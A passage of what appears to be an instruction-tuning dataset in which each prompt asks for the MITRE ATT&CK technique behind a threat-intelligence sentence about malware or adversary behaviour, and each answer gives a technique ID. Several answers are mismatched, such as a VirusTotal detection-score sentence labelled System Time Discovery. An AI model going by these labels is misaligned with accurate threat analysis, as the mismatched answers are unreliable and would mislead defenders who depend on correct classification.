used PowerShell to create new tasks on remote machines, identify configuration settings, exfiltrate data, and to execute other commands.### Assistant: T1059: Command and Scripting Interpreter" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,SodaMaster has the ability to download additional payloads from C2 to the targeted system.### Assistant: T1105: Ingress Tool Transfer" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Adversaries may deploy a container into an environment to facilitate execution or evade defenses.### Assistant: T1610: Deploy Container" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Windshift has used Visual Basic 6 payloads.### Assistant: T1059: Command and Scripting Interpreter" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Elise can download additional files from the C2 server for execution.### Assistant: T1105: Ingress Tool Transfer" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Pony has attempted to lure targets into clicking links in spoofed emails from legitimate banks.### Assistant: T1204: User Execution" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Conficker variants spread through NetBIOS share propagation.### Assistant: T1021: Remote Services" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Infected computers become part of a P2P botnet that can relay C2 traffic to other infected peers.### Assistant: T1090: Proxy" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,ADVSTORESHELL stores output from command execution in a .dat file in the %TEMP% directory.### Assistant: T1074: Data Staged" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,PoetRAT checked the size of the hard drive to determine if it was being run in a sandbox environment.### Assistant: T1497: Virtualization/Sandbox Evasion" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,The LNK file is moved to the startup directory### Assistant: T1547: Boot or Logon Autostart Execution" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,BabyShark has executed the ver command.### Assistant: T1082: System Information Discovery" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Sykipot may use net view /domain to display hostnames of available systems on a network.### Assistant: T1018: Remote System Discovery" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,APT34 has used WMI for execution.### Assistant: T1047: Windows Management Instrumentation" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Data captured by RawPOS is placed in a temporary file under a directory named ""memdump"".### Assistant: T1074: Data Staged" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Depending on the access configuration of the logon scripts, either local credentials or an administrator account may be necessary.### Assistant: T1037: Boot or Logon Initialization Scripts" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,PolyglotDuke can use Twitter, Reddit, Imgur and other websites to get a C2 URL.### Assistant: T1102: Web Service" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Examples have been found in the wild and there are some open source projects.### Assistant: T1547: Boot or Logon Autostart Execution" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,OSX_OCEANLOTUS.D sets the main loader file’s attributes to hidden.### Assistant: T1564: Hide Artifacts" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Gazer can establish persistence by creating a .lnk file in the Start menu or by modifying existing .lnk files to execute the malware through cmd.exe.### Assistant: T1547: Boot or Logon Autostart Execution" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,IcedID has packed and encrypted its loader module.### Assistant: T1027: Obfuscated Files or Information" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,The print spooler service runs under SYSTEM level permissions, therefore print processors installed by an adversary may run under elevated privileges.### Assistant: T1547: Boot or Logon Autostart Execution" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Kazuar gathers information about opened windows.### Assistant: T1010: Application Window Discovery" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Clipboard stealer ### Assistant: T1115: Clipboard Data" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Login items can be added via a shared file list or Service Management Framework.### Assistant: T1547: Boot or Logon Autostart Execution" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Valak has returned C2 data as encoded ASCII.### Assistant: T1132: Data Encoding" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,(Source: SecureWorks) China Chopper web shell — This web-based executable script communicates with a full-featured user interface to allow threat actors to transfer and create files, open a command terminal, and interact with database servers### Assistant: T1505: Server Software Component" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,gh0st RAT can create a new service to establish persistence.### Assistant: T1543: Create or Modify System Process" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,LightNeuron encrypts its configuration files with AES-256.### Assistant: T1027: Obfuscated Files or Information" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,After initial installation, Raindrop runs a computation to delay execution.### Assistant: T1497: Virtualization/Sandbox Evasion" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Code repositories are tools/services that store source code and automate software builds.### Assistant: T1213: Data from Information Repositories" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Nibatad is also a loader that leverages search order hijacking, and downloads an encrypted payload to the infected computer.### Assistant: T1574: Hijack Execution Flow" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Additionally, if the cloud environment is connected to a on-premises environment, adversaries may be able to identify services running on non-cloud systems as well.### Assistant: T1046: Network Service Scanning" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,For example, ""example.exe"" runs ""cmd.exe"" with the command-line argument net user.### Assistant: T1574: Hijack Execution Flow" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation.### Assistant: T1036: Masquerading" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,TrickBot can obtain passwords stored in files from web browsers such as Chrome, Firefox, Internet Explorer, and Microsoft Edge, sometimes using esentutl.### Assistant: T1555: Credentials from Password Stores" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Bonadan can use the ps command to discover other cryptocurrency miners active on the system.### Assistant: T1057: Process Discovery" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,SpyNote RAT captured the device’s screen activities along with audio using the  MediaProjectionCallback functionality (available with Lollipop, the Android 5.0 release, and later) and saved the output in a file named ""video.mp4"" as shown in the following screenshot: Figure 5 : Output File SMS stealing  SpyNote RAT was also observed stealing SMS messages from the affected devices, as shown in screenshot below: Figure 6: Reading SMS messages Stealing contacts The ability to steal contacts is a favorite feature for spyware developers, as the stolen contacts can be used to further spread the spyware### Assistant: T1113: Screen Capture" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Nerex drops a signed Microsoft DLL to disk.### Assistant: T1553: Subvert Trust Controls" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,CHM execution may also bypass application application control on older and/or unpatched systems that do not account for execution of binaries through hh.exe.### Assistant: T1218: Signed Binary Proxy Execution" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,TajMahal has the ability to index and compress files into a send queue for exfiltration.### Assistant: T1119: Automated Collection" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,In addition to Dynamic-link Library Injection, Mavinject.exe can also be abused to perform import descriptor injection via its /HMODULE command-line parameter .### Assistant: T1218: Signed Binary Proxy Execution" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Penquin can execute the command code do_upload to send files to C2.### Assistant: T1041: Exfiltration Over C2 Channel" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,NETWIRE has used a custom encryption algorithm to encrypt collected data.### Assistant: T1560: Archive Collected Data" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Bandook can upload files from a victim's machine over the C2 channel.### Assistant: T1041: Exfiltration Over C2 Channel" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Adversaries may establish persistence and/or elevate privileges by executing malicious content triggered by accessibility features.### Assistant: T1546: Event Triggered Execution" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Messages are encrypted using AES with a static key### Assistant: T1027: Obfuscated Files or Information" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Services, daemons, or agents may be created with administrator privileges but executed under root/SYSTEM privileges.### Assistant: T1543: Create or Modify System Process" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Azorult uses an XOR key to decrypt content and uses Base64 to decode the C2 address.### Assistant: T1140: Deobfuscate/Decode Files or Information" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,APT28 can exfiltrate data over Google Drive.### Assistant: T1567: Exfiltration Over Web Service" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,The data above contains the hostname (‘HOSTNAME-PC’) of the victim machine, as well as an instruction### Assistant: T1082: System Information Discovery" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,These events can locate open windows, send keystrokes, and interact with almost any open application locally or remotely.### Assistant: T1059: Command and Scripting Interpreter" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,SOUNDBITE is capable of modifying the Registry.### Assistant: T1112: Modify Registry" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Some TrickBot samples have used HTTP over ports 447 and 8082 for C2.### Assistant: T1571: Non-Standard Port" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Kimsuky has used mshta.exe to run malicious scripts on the system.### Assistant: T1218: Signed Binary Proxy Execution" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,TinyZBot can disable Avira anti-virus.### Assistant: T1562: Impair Defenses" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,SUNBURST created an Image File Execution Options Debugger registry value for the process dllhost.exe to trigger the installation of Cobalt Strike.### Assistant: T1546: Event Triggered Execution" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Execution via Thread Execution Hijacking may also evade detection from security products since the execution is masked under a legitimate process.### Assistant: T1055: Process Injection" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Once the user clicks on the fake Adobe Flash Player installer, it will extract/create the following malicious payload into the Startup directory to maintain its persistence:### Assistant: T1547: Boot or Logon Autostart Execution" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,ShimRat can list directories.### Assistant: T1083: File and Directory Discovery" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,SQLRat can make a direct SQL connection to a Microsoft database controlled by the attackers, retrieve an item from the bindata table, then write and execute the file on disk.### Assistant: T1105: Ingress Tool Transfer" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,APT29 has used HTTP for C2 and data exfiltration.### Assistant: T1071: Application Layer Protocol" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Pasam establishes by infecting the Security Accounts Manager DLL to load a malicious DLL dropped to disk.### Assistant: T1547: Boot or Logon Autostart Execution" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,SpeakUp attempts to exploit the following vulnerabilities in order to execute its malicious script: CVE-2012-0874, CVE-2010-1871, CVE-2017-10271, CVE-2018-2894, CVE-2016-3088, JBoss AS 3/4/5/6, and the Hadoop YARN ResourceManager.### Assistant: T1203: Exploitation for Client Execution" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,ShadowPad has collected the domain name of the victim system.### Assistant: T1016: System Network Configuration Discovery" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Variable Name Description gdu Google Drive URL for downloading files to the Google Drive account gduu Google Drive URL for uploading files to the Google Drive account gdue Google Drive URL for updating a file on the Google Drive account gdo2t Google Drive URL used to get the OAUTH access_token client_id The client_id for the OAUTH application cs The client_secret for OAUTH r_t The refresh_token for OAUTH Table 6 Variables used to store settings needed to use Google Drive as a C2 To obtain an OAUTH access token to authenticate to the actor provided Google account, the Trojan sends an HTTP POST request to a URL stored in the gdo2t variable with grant_type, client_id, client_secret, and refresh_token fields added to the HTTP header and in the POST data### Assistant: T1102: Web Service" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Via WMI (winmgmt), the JavaScript or VBscript code in the SCT file spawns a PowerShell one-liner which finally consumes the text file### Assistant: T1059: Command and Scripting Interpreter" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,FatDuke can call ShellExecuteW to open the default browser on the URL localhost.### Assistant: T1106: Native API" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,APT39 has used SMB for lateral movement.### Assistant: T1021: Remote Services" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,PUNCHBUGGY can delete files written to disk.### Assistant: T1070: Indicator Removal on Host" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,The Windows Time service enables time synchronization across and within domains.### Assistant: T1547: Boot or Logon Autostart Execution" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,MESSAGETAP uses the libpcap library to listen to all traffic and parses network protocols starting with Ethernet and IP layers.### Assistant: T1040: Network Sniffing" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Ramsay has included embedded Visual Basic scripts in malicious documents.### Assistant: T1059: Command and Scripting Interpreter" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,After the Registry is modified, pressing the appropriate key combination at the login screen while at the keyboard or when connected with Remote Desktop Protocol will cause the ""debugger"" program to be executed with SYSTEM privileges.### Assistant: T1546: Event Triggered Execution" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Checks for the presence of security tools (detailed in the Appendix) and if any of these security tools are discovered, then the system will be shut down, as shown in Figure 14### Assistant: T1518: Software Discovery" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,An adversary with sufficient permissions, such as via a pod's service account, may also use the Kubernetes API to retrieve credentials from the Kubernetes API server.### Assistant: T1552: Unsecured Credentials" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Proxysvc can delete files indicated by the attacker and remove itself from disk using a batch file.### Assistant: T1070: Indicator Removal on Host" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,BitPaymer can enumerate existing Windows services on the host that are configured to run as LocalSystem.### Assistant: T1007: System Service Discovery" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,The HISTCONTROL environment variable keeps track of what should be saved by the history command and eventually into the ~/.bash_history file when a user logs out.### Assistant: T1562: Impair Defenses" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Turian has the ability to use a XOR decryption key to extract C2 server domains and IP addresses.### Assistant: T1140: Deobfuscate/Decode Files or Information" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,REvil can decode encrypted strings to enable execution of commands and payloads.### Assistant: T1140: Deobfuscate/Decode Files or Information" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,For example, starting in MS Office 10, if a MS Office file has the MOTW, it will open in Protected View.### Assistant: T1553: Subvert Trust Controls" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,RDAT has used DNS to communicate with the C2.### Assistant: T1071: Application Layer Protocol" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Bonadan can find the external IP address of the infected host.### Assistant: T1016: System Network Configuration Discovery" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Microsoft Office documents can be poisoned with DDE commands , directly or through embedded files , and used to deliver execution via Phishing campaigns or hosted Web content, avoiding the use of Visual Basic for Applications macros.### Assistant: T1559: Inter-Process Communication" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Adversaries may also add the Parameters key, which stores driver-specific data, or other custom subkeys for their malicious services to establish persistence or enable other malicious activities.### Assistant: T1574: Hijack Execution Flow" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Similar to Process Hollowing, proc memory injection may target child processes .### Assistant: T1055: Process Injection" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Turla has gathered credentials from the Windows Credential Manager tool.### Assistant: T1555: Credentials from Password Stores" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,After the second DLL is loaded into memory, the first DLL overwrites the IP address for the control server, effectively changing the address the malware will communicate with### Assistant: T1016: System Network Configuration Discovery" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Adversaries can use the network CLI to change how network devices behave and operate.### Assistant: T1059: Command and Scripting Interpreter" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,APT29 has used GoldFinder to perform HTTP GET requests to check internet connectivity and identify HTTP proxy servers and other redirectors that an HTTP request travels through.### Assistant: T1016: System Network Configuration Discovery" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Adversaries can hide a program's true filetype by changing the extension of a file.### Assistant: T1036: Masquerading" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,The file appears to have been compiled using a bat2exe tool, which will take batch files (.bat) and convert them to PE (.exe) files### Assistant: T1083: File and Directory Discovery" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Microsoft SQL Server can enable common language runtime integration.### Assistant: T1505: Server Software Component" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Instead of setting up their own DNS servers, adversaries may compromise third-party DNS servers in support of operations.### Assistant: T1584: Compromise Infrastructure" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,This may be done to evade some defenses, such as static indicator scanning tools and anti-virus.### Assistant: T1564: Hide Artifacts" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,DownPaper uses the command line.### Assistant: T1059: Command and Scripting Interpreter" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Cobalt Strike can exploit Oracle Java vulnerabilities for execution, including CVE-2011-3544, CVE-2013-2465, CVE-2012-4681, and CVE-2013-2460.### Assistant: T1203: Exploitation for Client Execution" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,PLEAD has the ability to steal saved credentials from web browsers.### Assistant: T1555: Credentials from Password Stores" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,The Citrix executable was dropped along with BBSRAT by the dropper.### Assistant: T1574: Hijack Execution Flow" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,APT39 has used the post exploitation tool CrackMapExec to enumerate network shares.### Assistant: T1135: Network Share Discovery" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Ursnif droppers have used WMI classes to execute PowerShell commands.### Assistant: T1047: Windows Management Instrumentation" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Lokibot has the ability to initiate contact with command and control to exfiltrate stolen data.### Assistant: T1041: Exfiltration Over C2 Channel" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,For example, HTTPS over port 8088 or port 587 as opposed to the traditional port 443.### Assistant: T1571: Non-Standard Port" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Adversaries may look for details about the network configuration and settings, such as IP and/or MAC addresses, of systems they access or through information discovery of remote systems.### Assistant: T1016: System Network Configuration Discovery" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,TrickBot uses vncDll module to remote control the victim machine.### Assistant: T1219: Remote Access Software" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,APT38 uses a tool called CLEANTOAD that has the capability to modify Registry keys.### Assistant: T1112: Modify Registry" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Goopy has used a polymorphic decryptor to decrypt itself at runtime.### Assistant: T1140: Deobfuscate/Decode Files or Information" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Darkhotel has sent spearphishing emails in an attempt to lure users into clicking on a malicious attachments.### Assistant: T1204: User Execution" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,CosmicDuke contains a custom version of the RC4 algorithm that includes a programming error.### Assistant: T1573: Encrypted Channel" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Sidewinder has used tools to obtain the current system time.### Assistant: T1124: System Time Discovery" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,The key can be hardcoded or negotiated with the C2 server in the registration phase.### Assistant: T1573: Encrypted Channel" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,File systems can also contain other structures, such as the Volume Boot Record and Master File Table in NTFS.### Assistant: T1564: Hide Artifacts" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,The script self-scheduling, as well as the scheduling of a script that repeatedly attempts to download and execute the Revenge RAT binary, significantly contribute to the persistence of this infection### Assistant: T1105: Ingress Tool Transfer" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,FruitFly has the ability to list processes on the system.### Assistant: T1057: Process Discovery" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,This information could be useful for performing other techniques, such as executing a file with a Scheduled Task/Job , or to discover locality information based on time zone to assist in victim targeting System Location Discovery.### Assistant: T1124: System Time Discovery" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,A Network DoS will occur when the bandwidth capacity of the network connection to a system is exhausted due to the volume of malicious traffic directed at the resource or the network connections and network devices the resource relies on.### Assistant: T1498: Network Denial of Service" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,When a user logs in, a per-user launchd process is started which loads the parameters for each launch-on-demand user agent from the property list file found in /System/Library/LaunchAgents, /Library/LaunchAgents, and ~/Library/LaunchAgents.### Assistant: T1543: Create or Modify System Process" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,!CMD Trojan executes a command prompt command### Assistant: T1059: Command and Scripting Interpreter" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,LONGWATCH is a keylogger that outputs keystrokes to a log.txt file in the Window’s temp folder.### Assistant: T1056: Input Capture" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,SHA256 a77f9e441415dbc8a20ad66d4d00ae606faab370ffaee5604e93ed484983d3ff MD5 1ff40e79d673461cd33bd8b68f8bb5b8 Compiled 2017.08.06 11:32:36 (GMT), 2.22 Type I386 Windows Console EXE Size 101 888 Instead of implementing this auxiliary module in the form of a dynamic linked library with its corresponding exported functions, the developers decided to use a standalone executable started by events.exe with the following parameters: Parameter Description -scr Screenshot file name to save in Cache006 subdirectory, zipped with password from configuration### Assistant: T1036: Masquerading" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,GreyEnergy uses PsExec locally in order to execute rundll32.exe at the highest privileges .### Assistant: T1218: Signed Binary Proxy Execution" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Cobalt Strike can use known credentials to run commands and spawn processes as a domain user account.### Assistant: T1078: Valid Accounts" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Kwampirs collects OS version information such as registered owner details, manufacturer details, processor type, available storage, installed patches, hostname, version info, system date, and other system information by using the commands systeminfo, net config workstation, hostname, ver, set, and date /t.### Assistant: T1082: System Information Discovery" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,UNC2452 renamed a version of AdFind to sqlceip.exe or csrss.exe in an attempt to appear as the SQL Server Telemetry Client or Client Service Runtime Process, respectively.### Assistant: T1036: Masquerading" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,The KDC service runs all on domain controllers that are part of an Active Directory domain.### Assistant: T1558: Steal or Forge Kerberos Tickets" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Equation has been observed utilizing environmental keying in payload delivery.### Assistant: T1480: Execution Guardrails" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,GoldMax appeared as a scheduled task impersonating systems management software within the corresponding ProgramData subfolder.### Assistant: T1036: Masquerading" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,jRAT can be configured to reconnect at certain intervals.### Assistant: T1029: Scheduled Transfer" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,PLAINTEE encodes C2 beacons using XOR.### Assistant: T1573: Encrypted Channel" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,SideTwist can collect the username on a targeted system.### Assistant: T1033: System Owner/User Discovery" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Some methods include: * Hooking API callbacks used for processing keystrokes.### Assistant: T1056: Input Capture" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,They are known for “living off the land,” meaning they use already available tools and software installed on the computer to operate, and once inside a target network, they will tailor their malware specifically to the target### Assistant: T1518: Software Discovery" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,This information can then be transmitted to the attacker using protocols such as FTP, HTTP, and SMTP### Assistant: T1071: Application Layer Protocol" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Mofang's spearphishing emails required a user to click the link to connect to a compromised website.### Assistant: T1204: User Execution" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Frankenstein has deobfuscated base64-encoded commands following the execution of a malicious script, which revealed a small script designed to obtain an additional payload.### Assistant: T1140: Deobfuscate/Decode Files or Information" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Alarmingly, the detection score on VirusTotal for all of the documents continues to be 0/56 from the time the first documents were uploaded (1.6.2017) up until the date of this publication### Assistant: T1124: System Time Discovery" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,These profilers are designed to monitor, troubleshoot, and debug managed code executed by the .NET CLR.### Assistant: T1574: Hijack Execution Flow" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Carbanak has a command to create a reverse shell.### Assistant: T1059: Command and Scripting Interpreter" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Rancor has used VBS scripts as well as embedded macros for execution.### Assistant: T1059: Command and Scripting Interpreter" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Drovorub can use the WebSocket protocol and has initiated communication with C2 servers with an HTTP Upgrade request.### Assistant: T1071: Application Layer Protocol" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,In addition, although the 2017 campaign has been documented, during our research regarding MirageFox, we found a recently uploaded binary (6/8/2018) from the 2017 campaign, pretty much identical to a RAT mentioned in their RoyalAPT report, barely detected with only 7/66 detections on VirusTotal.  APT15 Code Reuse We found the new version of the RAT on VirusTotal hunting, by a YARA signature we created based off code only found in Mirage and Reaver, both attributed to Chinese government affiliated groups### Assistant: T1571: Non-Standard Port" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Nebulae can use DLL side-loading to gain execution.### Assistant: T1574: Hijack Execution Flow" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,JavaScript for Automation is a macOS scripting language based on JavaScript, included as part of Apple’s Open Scripting Architecture , that was introduced in OSX 10.10.### Assistant: T1059: Command and Scripting Interpreter" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,APT19 sent spearphishing emails with malicious attachments in RTF and XLSM formats to deliver initial exploits.### Assistant: T1566: Phishing" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,APT41 has used DGAs to change their C2 servers monthly.### Assistant: T1568: Dynamic Resolution" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,navlu.dll is also the name of a legitimate Symantec DLL.### Assistant: T1036: Masquerading" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Emissary has the capability to execute the command net start to interact with services.### Assistant: T1007: System Service Discovery" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,FELIXROOT has also used WMI to query the Windows Registry.### Assistant: T1012: Query Registry" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Exfiltration to these cloud storage services can provide a significant amount of cover to the adversary if hosts within the network are already communicating with the service.### Assistant: T1567: Exfiltration Over Web Service" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,3PARA RAT has a command to set certain attributes such as creation/modification timestamps on files.### Assistant: T1070: Indicator Removal on Host" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,MoleNet can execute commands via the command line utility.### Assistant: T1059: Command and Scripting Interpreter" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Shamoon will reboot the infected system once the wiping functionality has been completed.### Assistant: T1529: System Shutdown/Reboot" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,An adversary may hide malicious VBA code by overwriting the VBA source code location with zero’s, benign code, or random bytes while leaving the previously compiled malicious p-code.### Assistant: T1564: Hide Artifacts" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Operation Wocao has used the net command to retrieve information about domain accounts.### Assistant: T1087: Account Discovery" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Chimera has renamed malware to GoogleUpdate.exe and WinRAR to jucheck.exe, RecordedTV.ms, teredo.tmp, update.exe, and msadcs1.exe.### Assistant: T1036: Masquerading" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,LookBack can take desktop screenshots.### Assistant: T1113: Screen Capture" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Ebury has used DNS requests over UDP port 53 for C2.### Assistant: T1071: Application Layer Protocol" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Chimera has used direct Windows system calls by leveraging Dumpert.### Assistant: T1106: Native API" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,ABK has the ability to inject shellcode into svchost.exe.### Assistant: T1055: Process Injection" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,When we converted the dates in the file strings from the Solar Hijri calendar to the Gregorian one, we found that they were close to the compilation times of the executables and also close to when Cadelle’s targets were initially compromised### Assistant: T1027: Obfuscated Files or Information" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Proton gathers credentials for Google Chrome.### Assistant: T1555: Credentials from Password Stores" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Packing an executable changes the file signature in an attempt to avoid signature-based detection.### Assistant: T1027: Obfuscated Files or Information" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Sidewinder has used tools to identify running processes on the victim's machine.### Assistant: T1057: Process Discovery" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,APT33 has sent spearphishing emails containing links to .hta files.### Assistant: T1566: Phishing" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,The certificates used during an operation may be created, acquired, or stolen by the adversary.### Assistant: T1553: Subvert Trust Controls" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Epic uses HTTP and HTTPS for C2 communications.### Assistant: T1071: Application Layer Protocol" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Adversaries may modify code signing policies in a number of ways, including through use of command-line or GUI utilities, Modify Registry, rebooting the computer in a debug/recovery mode, or by altering the value of variables in kernel memory.### Assistant: T1553: Subvert Trust Controls" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Blue Mockingbird has used Remote Desktop to log on to servers interactively and manually copy files to remote hosts.### Assistant: T1021: Remote Services" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,FIN8 has used remote code execution to download subsequent payloads.### Assistant: T1105: Ingress Tool Transfer" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,OilRig has used reg query “HKEY_CURRENT_USER\Software\Microsoft\Terminal Server Client\Default” on a victim to query the Registry.### Assistant: T1012: Query Registry" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Adversaries can modify these values to continually execute arbitrary commands.### Assistant: 